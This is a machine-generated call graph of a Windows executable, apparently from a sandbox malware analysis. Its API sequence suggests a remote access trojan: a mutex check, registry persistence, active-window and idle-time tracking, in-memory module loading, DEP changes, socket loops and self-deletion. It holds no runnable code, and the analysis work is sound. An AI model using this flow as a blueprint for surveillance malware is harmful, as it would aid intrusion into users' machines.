53004->53005 53006 41bb8e 53005->53006 53176 441e81 53006->53176 53009 402093 28 API calls 53010 412f7a 53009->53010 53010->52875 53016 402eb0 53011->53016 53012 402ef2 53013 401fb0 28 API calls 53012->53013 53014 402ef0 53013->53014 53015 402055 11 API calls 53014->53015 53017 402f09 53015->53017 53016->53012 53018 402ee7 53016->53018 53017->52907 53185 403365 28 API calls 53018->53185 53021 4022ac 53020->53021 53022 40225c 53020->53022 53021->52984 53022->53021 53031 402779 11 API calls std::_Deallocate 53022->53031 53025 40b966 53024->53025 53026 40b938 53024->53026 53043 4028a4 22 API calls 53025->53043 53032 4027e6 53026->53032 53030 40b942 53030->52986 53031->53021 53033 4027ef 53032->53033 53034 402851 53033->53034 53035 4027f9 53033->53035 53045 4028a4 22 API calls 53034->53045 53038 402802 53035->53038 53040 402815 53035->53040 53044 402aea 28 API calls __EH_prolog 53038->53044 53041 402813 53040->53041 53042 402252 11 API calls 53040->53042 53041->53030 53042->53041 53044->53041 53047 274c1c6b ___scrt_fastfail 53046->53047 53060 274c12ee 53047->53060 53049 274c1c87 53049->52989 53102 411cfe 53050->53102 53053 411f67 22 API calls new 53053->52988 53055 404186 53054->53055 53056 402252 11 API calls 53055->53056 53057 404191 53056->53057 53155 4041bc 53057->53155 53061 274c1324 ___scrt_fastfail 53060->53061 53062 274c13b7 GetEnvironmentVariableW 53061->53062 53086 274c10f1 53062->53086 53065 274c10f1 57 API calls 53066 274c1465 53065->53066 53067 274c10f1 57 API calls 53066->53067 53068 274c1479 53067->53068 53069 274c10f1 57 API calls 53068->53069 53070 274c148d 53069->53070 53071 274c10f1 57 API calls 53070->53071 53072 274c14a1 53071->53072 53073 274c10f1 57 API calls 53072->53073 53074 274c14b5 lstrlenW 53073->53074 53075 274c14d9 lstrlenW 53074->53075 53085 274c14d2 53074->53085 53076 274c10f1 57 API calls 53075->53076 53077 274c1501 lstrlenW lstrcatW 53076->53077 53078 274c10f1 57 API calls 53077->53078 53079 274c1539 lstrlenW lstrcatW 53078->53079 53080 274c10f1 57 API calls 53079->53080 53081 274c156b lstrlenW lstrcatW 53080->53081 53082 274c10f1 57 API calls 53081->53082 53083 274c159d lstrlenW lstrcatW 53082->53083 53084 274c10f1 57 API calls 53083->53084 53084->53085 53085->53049 53087 274c1118 ___scrt_fastfail 53086->53087 53088 274c1129 lstrlenW 53087->53088 53099 274c2c40 53088->53099 53091 274c1168 lstrlenW 53092 274c1177 lstrlenW FindFirstFileW 53091->53092 53093 274c11a0 53092->53093 53094 274c11e1 53092->53094 53095 274c11aa 53093->53095 53096 274c11c7 FindNextFileW 53093->53096 53094->53065 53095->53096 53101 274c1000 57 API calls ___scrt_fastfail 53095->53101 53096->53093 53098 274c11da FindClose 53096->53098 53098->53094 53100 274c1148 lstrcatW lstrlenW 53099->53100 53100->53091 53100->53092 53101->53095 53135 41179c 53102->53135 53104 411d1c 53105 411d32 SetLastError 53104->53105 53106 41179c SetLastError 53104->53106 53114 411cfa 53104->53114 53105->53114 53107 411d4f 53106->53107 53107->53105 53109 411d71 GetNativeSystemInfo 53107->53109 53107->53114 53110 411db7 53109->53110 53111 411dc4 SetLastError 53110->53111 53138 411ca3 VirtualAlloc 53110->53138 53111->53114 53114->53053 53115 411de7 53116 411e0c GetProcessHeap HeapAlloc 53115->53116 53148 411ca3 VirtualAlloc 53115->53148 53117 411e23 53116->53117 53118 411e35 53116->53118 53149 411cba VirtualFree 53117->53149 53121 41179c SetLastError 53118->53121 53123 411e7e 53121->53123 53122 411dff 53122->53111 53122->53116 53124 411f30 53123->53124 53139 411ca3 VirtualAlloc 53123->53139 53150 412077 GetProcessHeap HeapFree 53124->53150 53127 411e97 ctype 53140 4117af SetLastError ctype ___scrt_get_show_window_mode 53127->53140 53129 411ec3 53129->53124 53141 411b5f 26 API calls 53129->53141 53131 411ef0 53131->53124 53142 41194f 53131->53142 53133 411efb 53133->53114 53133->53124 53134 411f25 SetLastError 53133->53134 53134->53124 53136 4117a0 SetLastError 53135->53136 53137 4117ab 53135->53137 53136->53104 53137->53104 53138->53115 53139->53127 53140->53129 53141->53131 53146 411975 53142->53146 53143 411a5e 53144 4118b2 VirtualProtect 53143->53144 53145 411a70 53144->53145 53145->53133 53146->53143 53146->53145 53151 4118b2 53146->53151 53148->53122 53149->53111 53150->53114 53152 4118c3 53151->53152 53154 4118bb 53151->53154 53153 411936 VirtualProtect 53152->53153 53152->53154 53153->53154 53154->53146 53156 4041c8 53155->53156 53159 4041d9 53156->53159 53158 40419c 53158->52995 53160 4041e9 53159->53160 53161 404206 53160->53161 53162 4041ef 53160->53162 53163 4027e6 28 API calls 53161->53163 53166 404267 53162->53166 53165 404204 53163->53165 53165->53158 53167 402888 22 API calls 53166->53167 53168 40427b 53167->53168 53169 404290 53168->53169 53170 4042a5 53168->53170 53171 4042df 22 API calls 53169->53171 53172 4027e6 28 API calls 53170->53172 53173 404299 53171->53173 53175 4042a3 53172->53175 53174 402c48 22 API calls 53173->53174 53174->53175 53175->53165 53177 441e8d 53176->53177 53180 441c7d 53177->53180 53179 41bbb2 53179->53009 53181 441c94 53180->53181 53183 441ccb _strftime 53181->53183 53184 4405dd 20 API calls _abort 53181->53184 53183->53179 53184->53183 53185->53014 53186->52970 53187->52972 53188->52792 53190 4020f6 28 API calls 53189->53190 53191 415b0c SetEvent 53190->53191 53192 415b21 53191->53192 53193 4041a2 28 API calls 53192->53193 53194 415b3b 53193->53194 53195 4020f6 28 API calls 53194->53195 53196 415b4b 53195->53196 53197 4020f6 28 API calls 53196->53197 53198 415b5d 53197->53198 53199 41be1b 28 API calls 53198->53199 53200 415b66 53199->53200 53202 415b86 GetTickCount 53200->53202 53203 415ce5 53200->53203 53267 415cd6 53200->53267 53201 401e8d 11 API calls 53205 417092 53201->53205 53204 41bb8e 28 API calls 53202->53204 53265 415cf9 53203->53265 53203->53267 53206 415b97 53204->53206 53208 401fd8 11 API calls 53205->53208 53268 41bae6 GetLastInputInfo GetTickCount 53206->53268 53210 41709e 53208->53210 53212 401fd8 11 API calls 53210->53212 53211 415ba3 53213 41bb8e 28 API calls 53211->53213 53214 4170aa 53212->53214 53215 415bae 53213->53215 53269 41ba96 53215->53269 53218 41bd1e 28 API calls 53219 415bca 53218->53219 53220 401e65 22 API calls 53219->53220 53221 415bd8 53220->53221 53222 402f31 28 API calls 53221->53222 53223 415be6 53222->53223 53224 402ea1 28 API calls 53223->53224 53225 415bf5 53224->53225 53226 402f10 28 API calls 53225->53226 53227 415c04 53226->53227 53228 402ea1 28 API calls 53227->53228 53229 415c13 53228->53229 53230 402f10 28 API calls 53229->53230 53231 415c1f 53230->53231 53232 402ea1 28 API calls 53231->53232 53233 415c29 53232->53233 53234 404aa1 61 API calls 53233->53234 53235 415c38 53234->53235 53236 401fd8 11 API calls 53235->53236 53237 415c41 53236->53237 53238 401fd8 11 API calls 53237->53238 53239 415c4d 53238->53239 53240 401fd8 11 API calls 53239->53240 53241 415c59 53240->53241 53242 401fd8 11 API calls 53241->53242 53243 415c65 53242->53243 53244 401fd8 11 API calls 53243->53244 53245 415c71 53244->53245 53246 401fd8 11 API calls 53245->53246 53247 415c7d 53246->53247 53248 401f09 11 API calls 53247->53248 53249 415c86 53248->53249 53250 401fd8 11 API calls 53249->53250 53251 415c8f 53250->53251 53252 401fd8 11 API calls 53251->53252 53253 415c98 53252->53253 53254 401e65 22 API calls 53253->53254 53255 415ca3 53254->53255 53274 43baac 53255->53274 53258 415cb5 53261 415cc3 53258->53261 53262 415cce 53258->53262 53259 415cdb 53260 401e65 22 API calls 53259->53260 53260->53203 53278 404ff4 82 API calls 53261->53278 53279 404f51 53262->53279 53294 4050e4 84 API calls 53265->53294 53266 415cc9 53266->53267 53267->53201 53268->53211 53295 436e90 53269->53295 53272 40417e 28 API calls 53273 415bbc 53272->53273 53273->53218 53275 43bac5 _swprintf 53274->53275 53297 43ae03 53275->53297 53277 415cb0 53277->53258 53277->53259 53278->53266 53280 404fea 53279->53280 53281 404f65 53279->53281 53280->53267 53282 404f6e 53281->53282 53283 404fc0 CreateEventA CreateThread 53281->53283 53284 404f7d GetLocalTime 53281->53284 53282->53283 53283->53280 53326 405150 53283->53326 53285 41bb8e 28 API calls 53284->53285 53286 404f91 53285->53286 53325 4052fd 28 API calls 53286->53325 53294->53266 53296 41bab5 GetForegroundWindow GetWindowTextW 53295->53296 53296->53272 53313 43ba0a 53297->53313 53299 43ae50 53319 43a7b7 36 API calls 2 library calls 53299->53319 53300 43ae15 53300->53299 53301 43ae2a 53300->53301 53304 43ae2f _strftime 53300->53304 53318 4405dd 20 API calls _abort 53301->53318 53304->53277 53306 43ae5c 53307 43ae8b 53306->53307 53320 43ba4f 40 API calls __Toupper 53306->53320 53309 43aef7 53307->53309 53321 43b9b6 20 API calls 2 library calls 53307->53321 53322 43b9b6 20 API calls 2 library calls 53309->53322 53311 43afbe _swprintf 53311->53304 53323 4405dd 20 API calls _abort 53311->53323 53314 43ba22 53313->53314 53315 43ba0f 53313->53315 53314->53300 53324 4405dd 20 API calls _abort 53315->53324 53317 43ba14 _strftime 53317->53300 53318->53304 53319->53306 53320->53306 53321->53309 53322->53311 53323->53304 53324->53317 53329 40515c 102 API calls 53326->53329 53328 405159 53329->53328 53330->52735 53331->52740 53332->52742 53333 434887 53334 434893 ___DestructExceptionObject 53333->53334 53360 434596 53334->53360 53337 43489a 53338 4348c3 53337->53338 53658 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 53337->53658 53346 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 53338->53346 53659 444251 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53338->53659 53340 4348dc 53342 4348e2 ___DestructExceptionObject 53340->53342 53660 4441f5 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53340->53660 53343 434962 53371 434b14 53343->53371 53346->53343 53661 4433e7 36 API calls 6 library calls 53346->53661 53353 434984 53354 43498e 53353->53354 53663 44341f 28 API calls _abort 53353->53663 53356 434997 53354->53356 53664 4433c2 28 API calls _abort 53354->53664 53665 43470d 13 API calls 2 library calls 53356->53665 53359 43499f 53359->53342 53361 43459f 53360->53361 53666 434c52 IsProcessorFeaturePresent 53361->53666 53363 4345ab 53667 438f31 10 API calls 4 library calls 53363->53667 53365 4345b0 53366 4345b4 53365->53366 53668 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53365->53668 53366->53337 53368 4345bd 53369 4345cb 53368->53369 53669 438f5a 8 API calls 3 library calls 53368->53669 53369->53337 53372 436e90 ___scrt_get_show_window_mode 53371->53372 53373 434b27 GetStartupInfoW 53372->53373 53374 434968 53373->53374 53375 4441a2 53374->53375 53670 44f059 53375->53670 53377 434971 53380 40e9c5 53377->53380 53378 4441ab 53378->53377 53674 446815 36 API calls 53378->53674 53676 41cb50 LoadLibraryA GetProcAddress 53380->53676 53382 40e9e1 GetModuleFileNameW 53681 40f3c3 53382->53681 53384 40e9fd 53385 4020f6 28 API calls 53384->53385 53386 40ea0c 53385->53386 53387 4020f6 28 API calls 53386->53387 53388 40ea1b 53387->53388 53389 41be1b 28 API calls 53388->53389 53390 40ea24 53389->53390 53696 40fb17 53390->53696 53392 40ea2d 53393 401e8d 11 API calls 53392->53393 53394 40ea36 53393->53394 53395 40ea93 53394->53395 53396 40ea49 53394->53396 53397 401e65 22 API calls 53395->53397 53890 40fbb3 97 API calls 53396->53890 53399 40eaa3 53397->53399 53403 401e65 22 API calls 53399->53403 53400 40ea5b 53401 401e65 22 API calls 53400->53401 53402 40ea67 53401->53402 53891 410f37 36 API calls __EH_prolog 53402->53891 53404 40eac2 53403->53404 53405 40531e 28 API calls 53404->53405 53407 40ead1 53405->53407 53409 406383 28 API calls 53407->53409 53408 40ea79 53892 40fb64 78 API calls 53408->53892 53412 40eadd 53409->53412 53411 40ea82 53893 40f3b0 71 API calls 53411->53893 53414 401fe2 28 API calls 53412->53414 53415 40eae9 53414->53415 53416 401fd8 11 API calls 53415->53416 53417 40eaf2 53416->53417 53419 401fd8 11 API calls 53417->53419 53418 401fd8 11 API calls 53420 40eefb 53418->53420 53421 40eafb 53419->53421 53662 4432f6 GetModuleHandleW 53420->53662 53422 401e65 22 API calls 53421->53422 53423 40eb04 53422->53423 53424 401fc0 28 API calls 53423->53424 53425 40eb0f 53424->53425 53426 401e65 22 API calls 53425->53426 53427 40eb28 53426->53427 53428 401e65 22 API calls 53427->53428 53429 40eb43 53428->53429 53430 40ebae 53429->53430 53894 406c1e 53429->53894 53432 401e65 22 API calls 53430->53432 53437 40ebbb 53432->53437 53433 40eb70 53434 401fe2 28 API calls 53433->53434 53435 40eb7c 53434->53435 53438 401fd8 11 API calls 53435->53438 53436 40ec02 53700 40d069 53436->53700 53437->53436 53442 413549 3 API calls 53437->53442 53439 40eb85 53438->53439 53899 413549 RegOpenKeyExA 53439->53899 53441 40ec08 53443 40ea8b 53441->53443 53703 41b2c3 53441->53703 53449 40ebe6 53442->53449 53443->53418 53447 40ec23 53450 40ec76 53447->53450 53720 407716 53447->53720 53448 40f34f 53992 4139a9 30 API calls 53448->53992 53449->53436 53902 4139a9 30 API calls 53449->53902 53453 401e65 22 API calls 53450->53453 53456 40ec7f 53453->53456 53455 40f365 53993 412475 65 API calls ___scrt_get_show_window_mode 53455->53993 53465 40ec90 53456->53465 53466 40ec8b 53456->53466 53459 40ec42 53903 407738 30 API calls 53459->53903 53460 40ec4c 53461 401e65 22 API calls 53460->53461 53474 40ec55 53461->53474 53462 40f36f 53464 41bc5e 28 API calls 53462->53464 53471 40f37f 53464->53471 53470 401e65 22 API calls 53465->53470 53906 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 53466->53906 53467 40ec47 53904 407260 98 API calls 53467->53904 53472 40ec99 53470->53472 53792 413a23 RegOpenKeyExW 53471->53792 53724 41bc5e 53472->53724 53474->53450 53478 40ec71 53474->53478 53475 40eca4 53728 401f13 53475->53728 53905 407260 98 API calls 53478->53905 53482 401f09 11 API calls 53484 40f39c 53482->53484 53483 401f09 11 API calls 53485 40ecb8 53483->53485 53486 401f09 11 API calls 53484->53486 53487 401e65 22 API calls 53485->53487 53488 40f3a5 53486->53488 53489 40ecc1 53487->53489 53795 40dd42 53488->53795 53494 401e65 22 API calls 53489->53494 53493 40f3af 53495 40ecdb 53494->53495 53496 401e65 22 API calls 53495->53496 53497 40ecf5 53496->53497 53498 401e65 22 API calls 53497->53498 53499 40ed0e 53498->53499 53501 401e65 22 API calls 53499->53501 53531 40ed7b 53499->53531 53500 40ed8a 53502 40ed93 53500->53502 53518 40ee0f ___scrt_get_show_window_mode 53500->53518 53505 40ed23 _wcslen 53501->53505 53503 401e65 22 API calls 53502->53503 53504 40ed9c 53503->53504 53506 401e65 22 API calls 53504->53506 53508 401e65 22 API calls 53505->53508 53505->53531 53509 40edae 53506->53509 53507 40ef06 ___scrt_get_show_window_mode 53967 4136f8 RegOpenKeyExA 53507->53967 53510 40ed3e 53508->53510 53512 401e65 22 API calls 53509->53512 53513 401e65 22 API calls 53510->53513 53514 40edc0 53512->53514 53515 40ed53 53513->53515 53519 401e65 22 API calls 53514->53519 53907 40da34 53515->53907 53516 40ef51 53517 401e65 22 API calls 53516->53517 53521 40ef76 53517->53521 53737 413947 53518->53737 53520 40ede9 53519->53520 53525 401e65 22 API calls 53520->53525 53526 402093 28 API calls 53521->53526 53524 401f13 28 API calls 53527 40ed72 53524->53527 53528 40edfa 53525->53528 53529 40ef88 53526->53529 53530 401f09 11 API calls 53527->53530 53965 40cdf9 46 API calls _wcslen 53528->53965 53747 41376f RegCreateKeyA 53529->53747 53530->53531 53531->53500 53531->53507 53535 40eea3 ctype 53540 401e65 22 API calls 53535->53540 53536 40ee0a 53536->53518 53538 401e65 22 API calls 53539 40efaa 53538->53539 53542 43baac 40 API calls 53539->53542 53541 40eeba 53540->53541 53541->53516 53545 40eece 53541->53545 53543 40efb7 53542->53543 53544 40efc1 53543->53544 53546 40efe4 53543->53546 53970 41cd9b 88 API calls ___scrt_get_show_window_mode 53544->53970 53547 401e65 22 API calls 53545->53547 53551 402093 28 API calls 53546->53551 53549 40eed7 53547->53549 53552 41bc5e 28 API calls 53549->53552 53550 40efc8 CreateThread 53550->53546 54452 41d45d 10 API calls 53550->54452 53553 40eff9 53551->53553 53554 40eee3 53552->53554 53555 402093 28 API calls 53553->53555 53966 40f474 114 API calls 53554->53966 53557 40f008 53555->53557 53560 41b4ef 80 API calls 53557->53560 53558 40eee8 53558->53516 53559 40eeef 53558->53559 53559->53443 53561 40f00d 53560->53561 53562 401e65 22 API calls 53561->53562 53563 40f019 53562->53563 53564 401e65 22 API calls 53563->53564 53565 40f02b 53564->53565 53566 401e65 22 API calls 53565->53566 53567 40f04b 53566->53567 53568 43baac 40 API calls 53567->53568 53569 40f058 53568->53569 53570 401e65 22 API calls 53569->53570 53571 40f063 53570->53571 53572 401e65 22 API calls 53571->53572 53573 40f074 53572->53573 53574 401e65 22 API calls 53573->53574 53575 40f089 53574->53575 53576 401e65 22 API calls 53575->53576 53577 40f09a 53576->53577 53578 40f0a1 StrToIntA 53577->53578 53753 409de4 53578->53753 53581 401e65 22 API calls 53582 40f0bc 53581->53582 53583 40f101 53582->53583 53584 40f0c8 53582->53584 53587 401e65 22 API calls 53583->53587 53971 4344ea 53584->53971 53589 40f111 53587->53589 53588 401e65 22 API calls 53590 40f0e4 53588->53590 53591 40f159 53589->53591 53592 40f11d 53589->53592 53593 40f0eb CreateThread 53590->53593 53595 401e65 22 API calls 53591->53595 53594 4344ea new 22 API calls 53592->53594 53593->53583 54451 419fb4 110 API calls __EH_prolog 53593->54451 53596 40f126 53594->53596 53597 40f162 53595->53597 53598 401e65 22 API calls 53596->53598 53600 40f1cc 53597->53600 53601 40f16e 53597->53601 53599 40f138 53598->53599 53602 40f13f CreateThread 53599->53602 53603 401e65 22 API calls 53600->53603 53604 401e65 22 API calls 53601->53604 53602->53591 54450 419fb4 110 API calls __EH_prolog 53602->54450 53606 40f1d5 53603->53606 53605 40f17e 53604->53605 53609 401e65 22 API calls 53605->53609 53607 40f1e1 53606->53607 53608 40f21a 53606->53608 53610 401e65 22 API calls 53607->53610 53778 41b60d GetComputerNameExW GetUserNameW 53608->53778 53611 40f193 53609->53611 53614 40f1ea 53610->53614 53978 40d9e8 53611->53978 53619 401e65 22 API calls 53614->53619 53615 401f13 28 API calls 53616 40f22e 53615->53616 53618 401f09 11 API calls 53616->53618 53621 40f237 53618->53621 53622 40f1ff 53619->53622 53624 40f240 SetProcessDEPPolicy 53621->53624 53625 40f243 CreateThread 53621->53625 53632 43baac 40 API calls 53622->53632 53623 401f13 28 API calls 53626 40f1b2 53623->53626 53624->53625 53627 40f264 53625->53627 53628 40f258 CreateThread 53625->53628 54422 40f7a7 53625->54422 53629 401f09 11 API calls 53626->53629 53630 40f279 53627->53630 53631 40f26d CreateThread 53627->53631 53628->53627 53633 40f1bb CreateThread 53629->53633 53635 40f2cc 53630->53635 53637 402093 28 API calls 53630->53637 53631->53630 54453 4126db 38 API calls ___scrt_get_show_window_mode 53631->54453 53634 40f20c 53632->53634 53633->53600 54449 401be9 50 API calls 53633->54449 53989 40c162 7 API calls 53634->53989 53789 4134ff RegOpenKeyExA 53635->53789 53638 40f29c 53637->53638 53990 4052fd 28 API calls 53638->53990 53644 40f2ed 53646 41bc5e 28 API calls 53644->53646 53648 40f2fd 53646->53648 53991 41361b 31 API calls 53648->53991 53652 40f313 53653 401f09 11 API calls 53652->53653 53656 40f31e 53653->53656 53654 40f346 DeleteFileW 53655 40f34d 53654->53655 53654->53656 53655->53462 53656->53462 53656->53654 53657 40f334 Sleep 53656->53657 53657->53656 53658->53337 53659->53340 53660->53346 53661->53343 53662->53353 53663->53354 53664->53356 53665->53359 53666->53363 53667->53365 53668->53368 53669->53366 53671 44f06b 53670->53671 53672 44f062 53670->53672 53671->53378 53675 44ef58 49 API calls 5 library calls 53672->53675 53674->53378 53675->53671 53677 41cb8f LoadLibraryA GetProcAddress 53676->53677 53678 41cb7f GetModuleHandleA GetProcAddress 53676->53678 53679 41cbb8 44 API calls 53677->53679 53680 41cba8 LoadLibraryA GetProcAddress 53677->53680 53678->53677 53679->53382 53680->53679 53994 41b4a8 FindResourceA 53681->53994 53684 43bd51 new 21 API calls 53685 40f3ed ctype 53684->53685 53686 4020b7 28 API calls 53685->53686 53687 40f408 53686->53687 53688 401fe2 28 API calls 53687->53688 53689 40f413 53688->53689 53690 401fd8 11 API calls 53689->53690 53691 40f41c 53690->53691 53692 43bd51 new 21 API calls 53691->53692 53693 40f42d ctype 53692->53693 53997 406dd8 53693->53997 53695 40f460 53695->53384 53697 40fb23 53696->53697 53699 40fb2a 53696->53699 54000 402163 11 API calls 53697->54000 53699->53392 54001 401fab 53700->54001 53702 40d073 CreateMutexA GetLastError 53702->53441 54002 41bfb7 53703->54002 53708 401fe2 28 API calls 53709 41b2ff 53708->53709 53710 401fd8 11 API calls 53709->53710 53712 41b307 53710->53712 53711 41b35d 53711->53447 53712->53711 53713 4135a6 31 API calls 53712->53713 53714 41b330 53713->53714 53715 41b33b StrToIntA 53714->53715 53716 41b352 53715->53716 53717 41b349 53715->53717 53718 401fd8 11 API calls 53716->53718 54011 41cf69 22 API calls 53717->54011 53718->53711 53721 40772a 53720->53721 53722 413549 3 API calls 53721->53722 53723 407731 53722->53723 53723->53459 53723->53460 53725 41bc72 53724->53725 53726 40b904 28 API calls 53725->53726 53727 41bc7a 53726->53727 53727->53475 53729 401f22 53728->53729 53730 401f6a 53728->53730 53731 402252 11 API calls 53729->53731 53730->53483 53732 401f2b 53731->53732 53733 401f6d 53732->53733 53734 401f46 53732->53734 54013 402336 53733->54013 54012 40305c 28 API calls 53734->54012 53738 413965 53737->53738 53739 406dd8 28 API calls 53738->53739 53740 41397a 53739->53740 53741 4020f6 28 API calls 53740->53741 53742 41398a 53741->53742 53743 41376f 14 API calls 53742->53743 53744 413994 53743->53744 53745 401fd8 11 API calls 53744->53745 53746 4139a1 53745->53746 53746->53535 53748 413788 53747->53748 53749 4137bf 53747->53749 53752 41379a RegSetValueExA RegCloseKey 53748->53752 53750 401fd8 11 API calls 53749->53750 53751 40ef9e 53750->53751 53751->53538 53752->53749 53754 409e02 _wcslen 53753->53754 53755 409e24 53754->53755 53756 409e0d 53754->53756 53758 40da34 32 API calls 53755->53758 53757 40da34 32 API calls 53756->53757 53760 409e15 53757->53760 53759 409e2c 53758->53759 53761 401f13 28 API calls 53759->53761 53762 401f13 28 API calls 53760->53762 53763 409e3a 53761->53763 53777 409e1f 53762->53777 53764 401f09 11 API calls 53763->53764 53765 409e42 53764->53765 54032 40915b 28 API calls 53765->54032 53766 401f09 11 API calls 53768 409e79 53766->53768 54017 40a109 53768->54017 53770 409e54 54033 403014 53770->54033 53774 401f13 28 API calls 53775 409e69 53774->53775 53776 401f09 11 API calls 53775->53776 53776->53777 53777->53766 53779 40417e 28 API calls 53778->53779 53780 41b65c 53779->53780 54232 4042fc 53780->54232 53783 403014 28 API calls 53784 41b672 53783->53784 53785 401f09 11 API calls 53784->53785 53786 41b67b 53785->53786 53787 401f09 11 API calls 53786->53787 53788 40f223 53787->53788 53788->53615 53790 413520 RegQueryValueExA RegCloseKey 53789->53790 53791 40f2e4 53789->53791 53790->53791 53791->53488 53791->53644 53793 40f392 53792->53793 53794 413a3f RegDeleteValueW 53792->53794 53793->53482 53794->53793 53796 40dd5b 53795->53796 53797 4134ff 3 API calls 53796->53797 53798 40dd62 53797->53798 53799 40dd81 53798->53799 54307 401707 53798->54307 53803 414f2a 53799->53803 53801 40dd6f 54310 413877 RegCreateKeyA 53801->54310 53804 4020df 11 API calls 53803->53804 53805 414f3e 53804->53805 54324 41b8b3 53805->54324 53808 4020df 11 API calls 53809 414f54 53808->53809 53810 401e65 22 API calls 53809->53810 53811 414f62 53810->53811 53812 43baac 40 API calls 53811->53812 53813 414f6f 53812->53813 53814 414f81 53813->53814 53815 414f74 Sleep 53813->53815 53816 402093 28 API calls 53814->53816 53815->53814 53817 414f90 53816->53817 53818 401e65 22 API calls 53817->53818 53819 414f99 53818->53819 53820 4020f6 28 API calls 53819->53820 53821 414fa4 53820->53821 53822 41be1b 28 API calls 53821->53822 53823 414fac 53822->53823 54328 40489e WSAStartup 53823->54328 53825 414fb6 53826 401e65 22 API calls 53825->53826 53827 414fbf 53826->53827 53828 401e65 22 API calls 53827->53828 53853 41503e 53827->53853 53829 414fd8 53828->53829 53830 401e65 22 API calls 53829->53830 53831 414fe9 53830->53831 53833 401e65 22 API calls 53831->53833 53832 41be1b 28 API calls 53832->53853 53834 414ffa 53833->53834 53836 401e65 22 API calls 53834->53836 53835 406c1e 28 API calls 53835->53853 53837 41500b 53836->53837 53839 401e65 22 API calls 53837->53839 53838 401fe2 28 API calls 53838->53853 53840 41501c 53839->53840 53841 401e65 22 API calls 53840->53841 53842 41502e 53841->53842 54354 40473d 89 API calls 53842->54354 53844 406383 28 API calls 53844->53853 53845 401e65 22 API calls 53845->53853 53847 41518c WSAGetLastError 54355 41cae1 30 API calls 53847->54355 53848 40482d 3 API calls 53848->53853 53851 404f51 105 API calls 53851->53853 53852 402093 28 API calls 53852->53853 53853->53832 53853->53835 53853->53838 53853->53844 53853->53845 53853->53847 53853->53848 53853->53851 53853->53852 53854 4048c8 97 API calls 53853->53854 53855 404e26 99 API calls 53853->53855 53856 40531e 28 API calls 53853->53856 53858 401e8d 11 API calls 53853->53858 53859 415a33 53853->53859 53862 41b4ef 80 API calls 53853->53862 53865 40905c 28 API calls 53853->53865 53866 441e81 20 API calls 53853->53866 53867 4020f6 28 API calls 53853->53867 53868 4136f8 3 API calls 53853->53868 53869 4135a6 31 API calls 53853->53869 53870 40417e 28 API calls 53853->53870 53873 41bb8e 28 API calls 53853->53873 53874 401e65 22 API calls 53853->53874 53878 41ba96 30 API calls 53853->53878 53879 41bd1e 28 API calls 53853->53879 53881 402f31 28 API calls 53853->53881 53882 402f10 28 API calls 53853->53882 53883 402ea1 28 API calls 53853->53883 53884 404aa1 61 API calls 53853->53884 53885 401fd8 11 API calls 53853->53885 53886 404c10 265 API calls 53853->53886 53888 415a71 CreateThread 53853->53888 53889 401f09 11 API calls 53853->53889 54329 414ee9 53853->54329 54335 41b7e0 53853->54335 54338 4145bd 53853->54338 54341 40dd89 53853->54341 54347 41bc42 53853->54347 54350 41bae6 GetLastInputInfo GetTickCount 53853->54350 54351 40f8d1 GetLocaleInfoA 53853->54351 54356 4052fd 28 API calls 53853->54356 53854->53853 53855->53853 53856->53853 53857 401e65 22 API calls 53857->53859 53858->53853 53859->53857 53860 43baac 40 API calls 53859->53860 54357 40b051 85 API calls 53859->54357 53861 415acf Sleep 53860->53861 53861->53853 53862->53853 53865->53853 53866->53853 53867->53853 53868->53853 53869->53853 53870->53853 53873->53853 53875 415439 GetTickCount 53874->53875 53876 41bb8e 28 API calls 53875->53876 53876->53853 53878->53853 53879->53853 53881->53853 53882->53853 53883->53853 53884->53853 53885->53853 53886->53853 53888->53853 54398 41ad17 106 API calls 53888->54398 53889->53853 53890->53400 53891->53408 53892->53411 53895 4020df 11 API calls 53894->53895 53896 406c2a 53895->53896 53897 4032a0 28 API calls 53896->53897 53898 406c47 53897->53898 53898->53433 53900 40eba4 53899->53900 53901 413573 RegQueryValueExA RegCloseKey 53899->53901 53900->53430 53900->53448 53901->53900 53902->53436 53903->53467 53904->53460 53905->53450 53906->53465 53908 401f86 11 API calls 53907->53908 53909 40da50 53908->53909 53910 40da70 53909->53910 53911 40daa5 53909->53911 53912 40da66 53909->53912 54414 41b5b4 29 API calls 53910->54414 53915 41bfb7 2 API calls 53911->53915 53914 40db99 GetLongPathNameW 53912->53914 53918 40417e 28 API calls 53914->53918 53916 40daaa 53915->53916 53919 40db00 53916->53919 53920 40daae 53916->53920 53917 40da79 53921 401f13 28 API calls 53917->53921 53922 40dbae 53918->53922 53923 40417e 28 API calls 53919->53923 53924 40417e 28 API calls 53920->53924 53925 40da83 53921->53925 53926 40417e 28 API calls 53922->53926 53928 40db0e 53923->53928 53929 40dabc 53924->53929 53931 401f09 11 API calls 53925->53931 53927 40dbbd 53926->53927 54399 40ddd1 53927->54399 53934 40417e 28 API calls 53928->53934 53935 40417e 28 API calls 53929->53935 53931->53912 53937 40db24 53934->53937 53938 40dad2 53935->53938 53940 402fa5 28 API calls 53937->53940 53941 402fa5 28 API calls 53938->53941 53939 402fa5 28 API calls 53942 40dbe5 53939->53942 53943 40db2f 53940->53943 53944 40dadd 53941->53944 53945 401f09 11 API calls 53942->53945 53946 401f13 28 API calls 53943->53946 53947 401f13 28 API calls 53944->53947 53948 40dbef 53945->53948 53949 40db3a 53946->53949 53950 40dae8 53947->53950 53951 401f09 11 API calls 53948->53951 53952 401f09 11 API calls 53949->53952 53953 401f09 11 API calls 53950->53953 53954 40dbf8 53951->53954 53955 40db43 53952->53955 53956 40daf1 53953->53956 53957 401f09 11 API calls 53954->53957 53958 401f09 11 API calls 53955->53958 53959 401f09 11 API calls 53956->53959 53960 40dc01 53957->53960 53958->53925 53959->53925 53961 401f09 11 API calls 53960->53961 53962 40dc0a 53961->53962 53963 401f09 11 API calls 53962->53963 53964 40dc13 53963->53964 53964->53524 53965->53536 53966->53558 53968 41371e RegQueryValueExA RegCloseKey 53967->53968 53969 413742 53967->53969 53968->53969 53969->53516 53970->53550 53973 4344ef 53971->53973 53972 43bd51 new 21 API calls 53972->53973 53973->53972 53974 40f0d1 53973->53974 54419 442f80 7 API calls 2 library calls 